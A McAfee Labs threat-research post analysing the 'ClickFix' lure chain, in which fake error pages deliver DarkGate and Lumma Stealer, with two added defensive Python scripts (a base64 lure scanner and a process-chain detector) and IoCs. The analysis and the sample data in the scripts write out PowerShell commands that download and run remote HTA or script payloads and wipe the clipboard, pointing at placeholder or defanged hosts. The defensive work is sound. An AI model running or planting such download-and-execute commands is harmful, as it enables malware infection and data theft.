Authored by Yashvi Shah and Vignesh Dhatchanamoorthy
McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.
The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.
We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:
Figure 1: Prevalence for the last three months
DarkGate delivered via “ClickFix”
DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email carrying an HTML attachment from its spam trap.
Figure 2: Email with Attachment
The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.
Figure 3: Fake “Word Online” extension error prompt
As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”
Before clicking the button, let’s examine the underlying code. The page contains several base64-encoded content blocks; the one of particular significance sits inside the <Title> tag and drives the whole scenario.
Figure 4: HTML contains Base64-encoded content in the title tag
Decoding it yields the following command:
Figure 5: After decoding the code
The decoded command instructs PowerShell to download an HTA (HTML Application) file from https://www.rockcreekdds.com/wp-content/1[.]hta and save it locally as C:\users\public\Ix.hta.
It then launches that file with Start-Process, which opens an .hta through its default handler, mshta.exe, so the attacker’s HTA code runs immediately. The command also runs Set-Clipboard -Value ‘ ‘, overwriting the clipboard with a single space so that the copied command is no longer there for the victim (or an investigator) to find, and finally terminates the PowerShell session with exit.
Upon further inspection of the HTML page, we found a JavaScript block at the end of the code.
Figure 6: Decoding function snippet
This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.
In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.
Let’s delve into it practically:
Figure 7: Clipboard contains malicious command
The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then CTRL+V (which pastes the clipboard contents) completes the social engineering. The Run dialog executes whatever is pasted into it, so the PowerShell command the page placed on the clipboard runs without the victim ever opening a terminal or reading the command. Note that what sits in the clipboard is the command itself, not the downloaded script; the download only happens once the command runs.
Once the user does this, PowerShell downloads the HTA file and launches it.
Figure 8: HTA code snippet
The HTA connects to the highlighted domain and runs a PowerShell script fetched from that malicious source. The remotely hosted script that gets executed is shown below.
Figure 9: Powershell code snippet
This PowerShell script runs without any further user interaction: it creates a folder on the C: drive, drops an AutoIt executable and an AutoIt script into it, and launches them automatically.
Figure 10: Downloaded zip contains AutoIT script
Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.
A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.
Lumma Stealer delivered via “ClickFix”
McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.
Figure 11: Showing error on accessing the webpage
It directs the target user to perform the following steps:
- Click on the “Copy Fix” button.
- Right-click on the Windows icon.
- Open Windows PowerShell (Admin).
- Right-click within the open terminal window (with the console’s default QuickEdit setting, a right-click pastes the clipboard contents, so this step runs the copied command).
- Wait for the update to complete.
Let’s analyze the code that gets copied when clicking the “Copy Fix” button.
Figure 12: Base64-encoded content
As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:
Figure 13: After decoding the Base64 content
This PowerShell script flushes the DNS cache, then decodes a base64-encoded command that fetches a script from the remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, disguising the request with a specific User-Agent header, and executes it. It then clears the console to hide its output and decodes a second base64 string whose command sets the clipboard to a single space, destroying the evidence of what was pasted. The nested encoding keeps the download-and-execute logic out of plain sight both on the web page and in the command the victim pastes; the script exists to fetch and run remote code covertly while hiding its activity from the user.
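The two lures analyzed above share one construction: a base64 string on the page (the title tag of the DarkGate HTML, the “Copy Fix” payload of the Lumma page) decodes to a PowerShell command that downloads and runs a second stage and then overwrites the clipboard. The Python triage script below automates that decoding for both cases. It is an added example written for this article, not McAfee’s tooling: it extracts base64 runs from a page, decodes each as UTF-8 and as UTF-16LE (the encoding PowerShell’s -EncodedCommand expects), flags the download, execute, HTA, window-hiding and clipboard-wiping hallmarks, and recurses into decoded text so that the nested encoding seen in the Lumma command is unpacked as well. The sample page, the command strings and the example.invalid URLs in it are constructed for the demonstration and are not from either campaign.

```python
"""Static triage of a ClickFix-style HTML lure (added example, not McAfee code).

Pulls base64 blobs out of a page, decodes them as UTF-8 and UTF-16LE, and
flags decoded text that looks like the download-and-execute PowerShell
commands analysed above. Nested encodings are followed. The sample lure
at the bottom is constructed; example.invalid is a placeholder host.
"""
import base64
import binascii
import re

# Runs of base64 alphabet long enough to carry a command, optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Hallmarks of the pasted commands seen in the DarkGate and Lumma lures.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "download": re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
        r"DownloadFile|curl|wget)\b", re.I),
    "execute": re.compile(r"\b(start-process|iex|Invoke-Expression)\b", re.I),
    "hta": re.compile(r"\.hta\b|\bmshta\b", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # Overwriting the clipboard with a space removes the evidence of the paste.
    "clipboard_wipe": re.compile(r"Set-Clipboard\s+-Value\s+['\"]\s*['\"]", re.I),
    # Hiding the window or clearing the console keeps the output from the victim.
    "hide": re.compile(r"\bclear\b|\bcls\b|-w(indowstyle)?\s+h(idden)?\b", re.I),
}


def _looks_like_text(s):
    return bool(s) and all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def _decode(blob):
    """Yield (encoding, text) for every text-like decoding of a base64 blob."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _looks_like_text(text):
            yield enc, text


def scan(text, depth=0, max_depth=3):
    """Findings for every decoded blob that matches an indicator; decoded
    text is scanned again so nested encodings are unpacked."""
    findings = []
    if depth > max_depth:
        return findings
    for blob in B64_RE.findall(text):
        for enc, decoded in _decode(blob):
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(decoded))
            if hits:
                findings.append({"depth": depth, "encoding": enc,
                                 "indicators": hits, "decoded": decoded})
                findings.extend(scan(decoded, depth + 1, max_depth))
    return findings


def is_clickfix_lure(html):
    """Flag a page when a decoded command wipes the clipboard or both
    downloads and executes something."""
    for f in scan(html):
        hits = set(f["indicators"])
        if "clipboard_wipe" in hits or {"download", "execute"} <= hits:
            return True
    return False


def _b64(s, enc="utf-8"):
    return base64.b64encode(s.encode(enc)).decode("ascii")


# --- constructed sample lure (placeholder host, not a real campaign) --------
DARKGATE_STYLE = (
    'powershell -w hidden -c "iwr https://example.invalid/wp-content/1.hta '
    "-OutFile C:\\users\\public\\Ix.hta; start-process C:\\users\\public\\Ix.hta; "
    "Set-Clipboard -Value ' '; exit\""
)
INNER = ("iwr https://example.invalid/chao/baby/cow.html -UseBasicParsing "
         "-Headers @{'User-Agent'='Mozilla/5.0'} | iex")
LUMMA_STYLE = ("ipconfig /flushdns; powershell -e " + _b64(INNER, "utf-16-le")
               + "; clear; Set-Clipboard -Value ' '")
SAMPLE_HTML = f"""<html><head><title>{_b64(DARKGATE_STYLE)}</title></head>
<body><button onclick="copyFix()">How to fix</button>
<script>function copyFix() {{ navigator.clipboard.writeText(atob("{_b64(LUMMA_STYLE)}")); }}</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML):
        print(f"depth={f['depth']} {f['encoding']:9} {','.join(f['indicators'])}")
        print("    ", f["decoded"][:90])
    print("ClickFix lure:", is_clickfix_lure(SAMPLE_HTML))
```

Run against a real lure, the title blob is reported at depth 0 with the HTA, execute and clipboard-wipe hallmarks, and the nested UTF-16LE command of the Lumma-style payload surfaces at depth 1. Long base64 runs that are not text (embedded images, fonts) fail the printable-text check and are dropped silently, which keeps the output to the commands worth reading.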
Upon execution, the following process tree is observed:
Figure 14: Process Tree
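The process tree is the most reliable place to catch ClickFix at runtime, because the victim’s own actions fix its shape: the Run dialog and the Win+X menu belong to explorer.exe, so the pasted PowerShell appears as a child of the shell, and in the DarkGate case it is followed by mshta.exe, a second PowerShell and AutoIt. The script below is an added example written for this article, not McAfee’s detection content. It rebuilds parent chains from Sysmon-style process-creation records and matches them against those stages, allowing intermediate processes in the chain. The records, PIDs, paths and URLs are constructed for the demonstration.

```python
"""Process-chain detection for the ClickFix stages (added example, not McAfee code).

Rebuilds parent/child chains from process-creation records and matches them
against the stages described above: the shell launching PowerShell that wipes
the clipboard, PowerShell handing an .hta to mshta.exe, the HTA stage spawning
PowerShell again, and AutoIt running under that chain. EVENTS is constructed in
a Sysmon-like shape; PIDs, paths and URLs are placeholders, not real telemetry.
"""
import ntpath
import re

# (rule name, ordered ancestor -> leaf image names, optional leaf command-line test)
RULES = [
    ("run_dialog_powershell_wipes_clipboard",
     ("explorer.exe", "powershell.exe"),
     re.compile(r"Set-Clipboard\s+-Value\s+['\"]\s*['\"]", re.I)),
    ("powershell_hands_hta_to_mshta",
     ("powershell.exe", "mshta.exe"),
     re.compile(r"\.hta\b", re.I)),
    ("hta_stage_spawns_powershell",
     ("mshta.exe", "powershell.exe"), None),
    ("autoit_under_hta_powershell_chain",
     ("mshta.exe", "powershell.exe", "autoit3.exe"), None),
]


def _basename(image):
    return ntpath.basename(image).lower()


def ancestry(pid, by_pid, max_depth=32):
    """Image names from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def _in_order(pattern, chain):
    """True when pattern occurs in chain in order, gaps allowed (a cmd.exe or
    conhost.exe in between does not break the match)."""
    it = iter(chain)
    return all(any(name == step for name in it) for step in pattern)


def detect(events):
    """Return (rule name, pid) for every process that completes a matching chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e["pid"], by_pid)
        for name, pattern, cmd_rx in RULES:
            if chain[-1] != pattern[-1]:
                continue  # alert on the process that ends the chain, not its parents
            if not _in_order(pattern, chain):
                continue
            if cmd_rx is not None and not cmd_rx.search(e.get("cmdline", "")):
                continue
            hits.append((name, e["pid"]))
    return hits


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed records following the DarkGate chain, plus one benign admin session.
EVENTS = [
    {"pid": 1200, "ppid": 900, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 1200, "image": PS,
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/1.hta -OutFile '
                "C:\\users\\public\\Ix.hta; start-process C:\\users\\public\\Ix.hta; "
                "Set-Clipboard -Value ' '\""},
    {"pid": 4180, "ppid": 4100, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": '"C:\\Windows\\System32\\mshta.exe" C:\\users\\public\\Ix.hta'},
    {"pid": 4220, "ppid": 4180, "image": PS,
     "cmdline": 'powershell -c "iwr https://example.invalid/stage2.ps1 | iex"'},
    {"pid": 4300, "ppid": 4220, "image": "C:\\stage\\AutoIt3.exe",
     "cmdline": "C:\\stage\\AutoIt3.exe C:\\stage\\script.a3x"},
    {"pid": 5000, "ppid": 1200, "image": PS, "cmdline": "powershell Get-Service"},
]

if __name__ == "__main__":
    by_pid = {e["pid"]: e for e in EVENTS}
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid} chain={' > '.join(ancestry(pid, by_pid))}")
```

The first rule fires only when the shell-launched PowerShell also wipes the clipboard, so an administrator who opens PowerShell from the Win+X menu to run Get-Service is not flagged. The later rules need no command-line content at all, because mshta.exe spawning PowerShell, and AutoIt running beneath that pair, is a chain shape legitimate software rarely produces. If your telemetry records a different parent for elevated launches, add that image to the first step of the chain rather than loosening the command-line test.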
The script downloads the malware from the URL above: a new folder is created under the user’s Temp directory and a ZIP archive is downloaded into it:
Figure 15: Network activity
The malware is unzipped and dropped in the same folder:
Figure 16: Dropped files
The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.
Conclusion:
The ClickFix social engineering technique is a highly effective method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.
Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to hide its activity from the victim, such as overwriting the clipboard contents and running processes in hidden or minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.
Mitigations:
At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:
- Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
- Install and maintain updated antivirus and anti-malware software on all endpoints.
- Implement robust email filtering to block phishing emails and malicious attachments.
- Use web filtering solutions to prevent access to known malicious websites.
- Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
- Use network segmentation to limit the spread of malware within the organization.
- Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
- Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
- Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
- Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
- Continuously monitor and analyze system and network logs for signs of compromise.
- Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
- Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.
Indicators of Compromise (IoCs)

| Family | Type | Indicator (SHA256 unless noted) |
| --- | --- | --- |
| DarkGate | | c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3 |
| DarkGate | HTML | 0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889 |
| DarkGate | HTA | 5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf |
| DarkGate | PS | e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2 |
| DarkGate | ZIP | 8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1 |
| DarkGate | AutoIt script | 7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81 |
| Lumma Stealer | URL | tuchinehd[.]com |
| Lumma Stealer | PS | 07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073 |
| Lumma Stealer | ZIP | 6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8 |
| Lumma Stealer | EXE | e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9 |